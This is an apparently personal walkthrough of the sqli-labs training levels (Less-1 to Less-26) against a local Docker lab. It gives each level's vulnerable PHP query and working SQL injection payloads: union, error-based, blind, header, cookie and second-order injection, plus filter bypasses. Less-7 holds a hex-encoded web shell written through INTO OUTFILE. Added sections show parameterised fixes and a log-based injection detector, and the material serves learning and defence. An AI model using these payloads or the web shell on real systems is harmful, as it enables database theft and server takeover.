sqli-labs

I feel like I'm really bad at this, sigh. Time to practise injection and get familiar with the various statements, so I don't get beaten too badly in future competitions.
Environment: docker
MySQL user: root, password: 123456

sudo docker pull 0bajie0/sqli-labs:v1
sudo docker run -ti --name sqli -p 2333:8080 0bajie0/sqli-labs:v1 /bin/bash
./run.sh

Less-1

code:

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

payload:
Detecting the injection:
http://127.0.0.1:2333/Less-1/?id=2'and 1=1 --+
Determining the number of columns:
http://127.0.0.1:2333/Less-1/?id=2' order by 3 --+
Finding the database name:
http://127.0.0.1:2333/Less-1/?id=2' and 1=2 union select 1,database(),3 --+
Finding the table names:
Use limit to page through the table names one at a time in a single display position.
Hex-encode the schema name so that no single quotes are needed.
http://127.0.0.1:2333/Less-1/?id=2' and 1=2 union select 1,table_name,3 from information_schema.tables where table_schema=0x7365637572697479 limit 0,1--+
Finding the column names:
Use group_concat() to show several results at once in a single display position.
http://127.0.0.1:2333/Less-1/?id=2' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_name = 'emails' and table_schema = 'security' --+
Data contents:
http://127.0.0.1:2333/Less-1/?id=2' and 1=2 union select 1,group_concat(email_id),3 from emails --+
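The Less-1 query shape, SELECT ... WHERE id='$id', is the whole reason the "and 1=1" / "and 1=2" probe above gives a yes/no answer. The following added example (my own code, not part of sqli-labs) builds that query two ways: spliced together as the lab does, and as a parameterised query. SQLite stands in for MySQL (an assumption; both treat "-- " as a comment and both accept the quoted id), and the sample rows are constructed stand-ins for the lab's users table.

```python
import sqlite3

# Added example, not the lab's code. SQLite is an assumed stand-in for MySQL:
# the quote-then-comment shape of the Less-1 probe works the same way in both.

def make_db():
    """Constructed sample data shaped like the lab's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?,?,?)",
                     [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you")])
    return conn

def lookup_concat(conn, user_id):
    """The vulnerable shape: the parameter becomes part of the SQL text."""
    sql = "SELECT * FROM users WHERE id='%s' LIMIT 0,1" % user_id
    return conn.execute(sql).fetchone()

def lookup_param(conn, user_id):
    """The fix: the value is bound separately and is never parsed as SQL."""
    sql = "SELECT * FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (user_id,)).fetchone()

def boolean_oracle(lookup):
    """True if the 'and 1=1' / 'and 1=2' pair from the post produce different results,
    i.e. if the page leaks a boolean oracle through this lookup function."""
    conn = make_db()
    # "--+" in the URL decodes to "-- " (the + is a space); "-- " comments out the rest.
    row_true = lookup(conn, "2' and 1=1 -- ")
    row_false = lookup(conn, "2' and 1=2 -- ")
    return (row_true is not None) and (row_false is None)

if __name__ == "__main__":
    print("concatenated query leaks an oracle:", boolean_oracle(lookup_concat))  # True
    print("parameterised query leaks an oracle:", boolean_oracle(lookup_param))  # False
```

With the bound parameter the whole probe string is compared against the integer id as one opaque value, so both probes return nothing and there is no difference to observe; the concatenated version returns a row for one and not the other, which is exactly the signal the post uses to decide that Less-1 is injectable.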

Less2

code:

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

payload:
Comment with #:
http://127.0.0.1:2333/Less-2/?id=-1 union select 1,2,group_concat(email_id) from emails %23

Less3

code:

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

payload:
http://127.0.0.1:2333/Less-3/?id=-1') union select 1,2,group_concat(email_id) from emails %23

Less4

code:

$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

payload:
http://127.0.0.1:2333/Less-4/?id=1") and 1>2 union select 1,2,group_concat(email_id) from emails --+

Less5

code:

error_reporting(0);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql); // $result is needed by the fetch below
$row = mysql_fetch_array($result);
if($row)
{
    echo 'You are in...........';
}
else
{
    print_r(mysql_error());
}

error_reporting(0) turns error reporting off.
error_reporting(E_ALL) turns error reporting on.
mysql_error() returns the text of the error produced by the previous MySQL operation; since it is printed here, error-based injection is usable.
This level shows no data, so use blind or error-based injection.
payload:
time-based (sleep):
http://127.0.0.1:2333/Less-5/?id=1' and if(ascii(substring((select email_id from emails limit 0,1),1,1))=68,sleep(5),0) --+
time-based (benchmark):
http://127.0.0.1:2333/Less-5/?id=1' and case when ascii(mid((select email_id from emails limit 0,1),1,1))<80 then benchmark(10000000,sha1(0x616263)) else 0 end --+
boolean-based:
http://127.0.0.1:2333/Less-5/?id=1' and ascii(mid((select email_id from emails limit 0,1),1,1))>50 %23

Less6

Same as 5, only the closing quote differs; let's use error-based for this one.
code:

$id = '"'.$id.'"';

payload:
updatexml:
http://127.0.0.1:2333/Less-6/?id=1" and updatexml(1,concat(0x7e,(select email_id from emails limit 0,1)),1)--+

Less7

code:

$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
if($row)
{echo 'You are in.... Use outfile......';}
else 
{echo 'You have an error in your SQL syntax'; }

It returns a generic error page: no error messages and no data, so blind injection would work, but this level is about writing a file.
payload:
http://127.0.0.1:2333/Less-7/?id=1')) union select 1,2,3,0x3C3F7068702073797374656D28245F4745545B2763275D293B3F3E into outfile '/var/www/html/sqli-labs/shell.php'--+
On Linux, MySQL runs with --secure-file-priv by default, so even with the FILE privilege nothing gets written; I couldn't write the file here -.-

Less8

code:

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
echo 'You are in...........';

Boolean-based blind injection
payload:
http://127.0.0.1:2333/Less-8/?id=1' and ascii(mid((select email_id from emails limit 0,1),1,1))>50--+

Less9

code:

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
echo 'You are in...........';

Time-based blind injection
payload:
http://127.0.0.1:2333/Less-9/?id=1' and if(ascii(mid((select email_id from emails limit 0,1),1,1))>50,sleep(5),0)--+

Less10

code:

$id = '"'.$id.'"';

Time-based blind injection
payload:
http://127.0.0.1:2333/Less-10/?id=1" and case when ascii(mid((select email_id from emails limit 0,1),1,1))>50 then sleep(2) else 0 end--+

Less11

code:

$uname=$_POST['uname'];
$passwd=$_POST['passwd'];
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
print_r(mysql_error());

POST injection
Double-query error-based injection
payload:

uname=1' union select 1,2,3,4 from (select+count(*),concat(floor(rand(0)*5),( select email_id from emails limit 1,1))a from information_schema.tables group by a)b%23&passwd=

Less12

code:

$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
The rest is the same as 11.

payload:
uname=1&passwd=1") union select 1,2,3,4 from (select+count(*),concat(floor(rand(0)*5),( select email_id from emails limit 1,1))a from information_schema.tables group by a)b%23

Less13

code:

@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";

payload:
uname=1&passwd=1') union select 1,2,3,4 from (select+count(*),concat(floor(rand(0)*5),( select email_id from emails limit 1,1))a from information_schema.tables group by a)b%23
Wow, the author of this program is a bit relentless; every kind of injection has to be done with every kind of quoting -。-

Less14

code:

$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";

payload:
I can't remember the double-query statement; I still think updatexml is easier to use, since I can write it out myself.
uname=1&passwd=1" and updatexml(1,concat(0x7e,(select email_id from emails limit 1,1)),1) --
Note that spaces no longer need to be replaced with + here, because this isn't in the URL but in the POST body.

Less15

code:

@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";

No error output.
Blind injection
payload:
uname=1&passwd=1' union select 1,if(ascii(mid((select email_id from emails limit 1,1),1,1))>50,sleep(5),0) %23
I ran into a problem on this level: if the injected statement is joined with and there is no delay, and with or the delay is also unreliable, so I used union here.

Less16

code:

$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";

payload:
uname=1&passwd=1") union select 1,if(ascii(mid((select email_id from emails limit 1,1),1,1))>10,sleep(5),0) %23

Less17

code:

$passwd=$_POST['passwd'];
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";

Error-based
payload:
uname=Dhakkan&passwd=1' and updatexml(1,concat(0x7e,(select email_id from emails limit 1,1)),1)%23

Less18

code:

$uagent = $_SERVER['HTTP_USER_AGENT'];
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
print_r(mysql_error());

The injection point is the User-Agent, inside an INSERT, and errors are printed, so error-based works.
But the INSERT only runs after a successful login, so valid credentials are needed first.
payload:
User-Agent: 1' and updatexml(1,concat(0x7e,(select email_id from emails limit 1,1)),1) and '1'='1
It seems only error-based statements can be used inside the INSERT.

Less19

code:

$uagent = $_SERVER['HTTP_REFERER'];
$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";

payload:
Referer: 1' and updatexml(1,concat(0x7e,(select email_id from emails limit 1,1)),1) and '1'='1

Less20

code:

$cookee = $row1['username'];
setcookie('uname', $cookee, time()+3600);
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";

The code is fairly simple; the flow is: don't POST anything, just put the injection in the uname field of the cookie.
payload:
Cookie: uname=admin' and extractvalue(1,concat(0x7e,(select email_id from emails limit 1,1))) -- -
Found something new on this level about the -- comment: it's best to write it as -- - for better tolerance.

Less21

code:

I looked at Less22 first; this level differs from 22 only in how the quotes close.

payload:
Cookie: uname=bWluJykgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChzZWxlY3QgZW1haWxfaWQgZnJvbSBlbWFpbHMgbGltaXQgMSwxKSkpIC0tIC0=

Less22

code:

$cookee = $_COOKIE['uname'];
$cookee = base64_decode($cookee);
$cookee1 = '"'. $cookee. '"';
$sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";

The only difference from 20 is double-quote closing, plus base64 encoding.
payload:
Cookie: uname=bWluIiBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBlbWFpbF9pZCBmcm9tIGVtYWlscyBsaW1pdCAxLDEpKSkgLS0gLQ==

Less23

code:

$id=$_GET['id'];
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

Here the comment markers are replaced with nothing, so commenting out the tail is not possible; instead the closing quote can be supplied directly.
payload:
http://127.0.0.1:2333/Less-23/?id=1' and case when ascii(mid((select email_id from emails limit 0,1),1,1))>50 then sleep(5) else 0 end and '1'='1
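Looking back over Less-1 to Less-23, every payload carries a small number of recognisable markers in the query string: union select, information_schema, sleep/benchmark, updatexml/extractvalue, an and/or followed by ascii/mid/substring, and a comment terminator. The following added example (my own code, not from the post or from sqli-labs) turns those markers into a triage script over constructed access-log lines whose request paths reuse the post's own payload shapes; the log format is assumed to be the common combined format. It is a detection aid for reviewing logs, not a sanitiser.

```python
import re
from urllib.parse import unquote_plus

# Added example, not from the post. The markers are the techniques the post's
# Less-1 to Less-23 payloads rely on; the log lines below are constructed.
MARKERS = {
    "union-based":   re.compile(r"\bunion\b.{0,40}\bselect\b", re.I),
    "schema-enum":   re.compile(r"information_schema\.", re.I),
    "time-based":    re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
    "error-based":   re.compile(r"\b(?:updatexml|extractvalue)\s*\(", re.I),
    "boolean-based": re.compile(r"\b(?:and|or)\b\s*(?:ascii|mid|substring)\s*\(", re.I),
    "comment-tail":  re.compile(r"(?:--\s|#|/\*)"),
}

# Assumed combined log format: ip ident user [time] "METHOD uri HTTP/x" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def decode(uri):
    """URL-decode repeatedly: payloads are sometimes double-encoded (%2527 -> %27 -> ')."""
    for _ in range(3):
        new = unquote_plus(uri)
        if new == uri:
            break
        uri = new
    return uri

def scan(lines):
    """Return (client_ip, raw_uri, [matched technique names]) for each suspicious line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, uri, _status = m.groups()
        decoded = decode(uri)
        found = [name for name, rx in MARKERS.items() if rx.search(decoded)]
        # A lone comment tail is too noisy by itself; require a real technique marker with it.
        if found and found != ["comment-tail"]:
            hits.append((ip, uri, found))
    return hits

# Constructed sample log; the request paths follow the post's payload shapes for Less-1/5/8/6.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2019:12:00:01 +0000] "GET /Less-1/?id=2 HTTP/1.1" 200 512',
    '10.0.0.5 - - [10/Oct/2019:12:00:02 +0000] "GET /Less-1/?id=2%27%20and%201=2%20union%20select%201,database(),3%20--+ HTTP/1.1" 200 540',
    '10.0.0.9 - - [10/Oct/2019:12:00:03 +0000] "GET /Less-5/?id=1%27%20and%20if(ascii(substring((select%20email_id%20from%20emails%20limit%200,1),1,1))=68,sleep(5),0)%20--+ HTTP/1.1" 200 480',
    '10.0.0.9 - - [10/Oct/2019:12:00:08 +0000] "GET /Less-8/?id=1%27%20and%20ascii(mid((select%20email_id%20from%20emails%20limit%200,1),1,1))%3E50--+ HTTP/1.1" 200 480',
    '10.0.0.9 - - [10/Oct/2019:12:00:09 +0000] "GET /Less-6/?id=1%22%20and%20updatexml(1,concat(0x7e,(select%20email_id%20from%20emails%20limit%200,1)),1)--+ HTTP/1.1" 200 611',
    '10.0.0.7 - - [10/Oct/2019:12:00:10 +0000] "GET /index.php?q=union%20station%20timetable HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, uri, found in scan(SAMPLE_LOG):
        print(ip, ", ".join(found), uri)
```

The benign "union station" search is not flagged, because "union" alone is not a marker; it has to be followed by "select" within a short distance. Decoding before matching matters: the post's "--+" only becomes the "-- " comment after the + is turned back into a space, and a single unquote_plus would miss a double-encoded quote.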

That's the end of the basic levels; exhausting.

Less24

code:
On this level every variable submitted directly from outside is escaped, so direct injection is not possible (wide-byte injection being the exception).

$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
There is too much code to paste, but in short it is a second-order injection: when registering, the ' in the username gets an escape character added, so what is saved in the database is a normal single quote; later the password-change page uses that username again, so the stored quote can be used to close the string.

payload:
Register the username admin' -- - with password 123, log in, then change the password.
A second-order injection just means the variable in the SQL statement is taken straight from the database; otherwise it is no different from ordinary injection.
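To make the Less-24 flow concrete, here is an added example (my own code, not the lab's) of a tiny registration plus password-change app. Registration escapes the quote, so the INSERT is safe and the stored username is the plain string admin' -- -; the UPDATE then splices the stored username back into SQL text because it "came from the database". SQLite stands in for MySQL (an assumption; it escapes by doubling the quote where mysql_real_escape_string would add a backslash, but the stored value is the same), and the admin row is constructed.

```python
import sqlite3

# Added example, not sqli-labs code. SQLite is an assumed stand-in for MySQL.

def make_app():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'adminpass')")  # constructed victim row
    return conn

def escape(s):
    """Input-side escaping, as the registration page does (SQLite style: double the quote)."""
    return s.replace("'", "''")

def register(conn, username, password):
    # Escaped at the entry point: the quote in the name is data here and is stored as a quote.
    conn.execute("INSERT INTO users VALUES ('%s', '%s')" % (escape(username), escape(password)))

def change_password_vuln(conn, logged_in_user, curr_pass, new_pass):
    """The lab's UPDATE shape: the POSTed passwords are escaped, but the username read back
    from the session/database is treated as trusted and spliced in unescaped."""
    sql = "UPDATE users SET password='%s' WHERE username='%s' AND password='%s'" % (
        escape(new_pass), logged_in_user, escape(curr_pass))
    conn.execute(sql)

def change_password_fixed(conn, logged_in_user, curr_pass, new_pass):
    """Parameterise at the point of use; where a value came from no longer matters."""
    conn.execute("UPDATE users SET password=? WHERE username=? AND password=?",
                 (new_pass, logged_in_user, curr_pass))

def admin_password_after(change_password):
    """Run the post's scenario: register admin' -- -, log in as it, change its own password,
    then report what the real admin's password is afterwards."""
    conn = make_app()
    register(conn, "admin' -- -", "123")
    # The session username is whatever the database stored for this account.
    stored_name = conn.execute("SELECT username FROM users WHERE username=?",
                               ("admin' -- -",)).fetchone()[0]
    change_password(conn, stored_name, "123", "changed")
    return conn.execute("SELECT password FROM users WHERE username='admin'").fetchone()[0]

if __name__ == "__main__":
    print("vulnerable:", admin_password_after(change_password_vuln))  # changed
    print("fixed:     ", admin_password_after(change_password_fixed))  # adminpass
```

In the vulnerable version the UPDATE becomes WHERE username='admin' -- -' AND password='123', so the current-password check is commented away and the real admin row is updated. The lesson for the defender is that escaping at the input boundary protects only that one statement; every statement that builds SQL from strings needs its own binding, which is why the fix is parameterisation at the point of use rather than more escaping at registration.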

Less25

code:

$id= preg_replace('/or/i',"", $id);
$id= preg_replace('/AND/i',"", $id);

and and or, in any letter case, are replaced with nothing.
payload:
Bypassing is simple:
1) &&, ||
2) aandnd, oorr
http://127.0.0.1:2333/Less-25/?id=1' aandnd updatexml(1,concat(0x7e,(select username from users limit 1,1)),1)%23

Less25a

code:

The difference from Less25 is that mysql_error() is not printed, so error-based is out.

payload:
http://127.0.0.1:2333/Less-25a/?id=1 aandnd if((ascii(mid((select username from users limit 0,1),1,1))>50),sleep(5),0) -- -

Less26

code:

$id= preg_replace('/or/i',"", $id);            
$id= preg_replace('/and/i',"", $id);        
$id= preg_replace('/[\/\*]/',"", $id);        
$id= preg_replace('/[--]/',"", $id);        
$id= preg_replace('/[#]/',"", $id);            
$id= preg_replace('/[\s]/',"", $id);    
$id= preg_replace('/[\/\\\\]/',"", $id);    

Filtered: or, and, /*, --, #, whitespace...
Bypassing the character filters is simple, as in Less25.
Getting around spaces:
1) comments /**/ (not usable on this level)
2) parentheses: select(1)and(1)
3) %a0
Getting around the comment filter:
;%00
The 1 before union is wrapped in single quotes, so no space is needed there.
Finally, returning data needs a limit clause; the space after limit cannot be replaced with (), but %a0 works as the space.
payload:

http://127.0.0.1:2333/Less-26/
?id=1' union(select(1),(2),(updatexml(1,(concat(0x7e,(select(username)from(users)limit%a01))),1)));%00
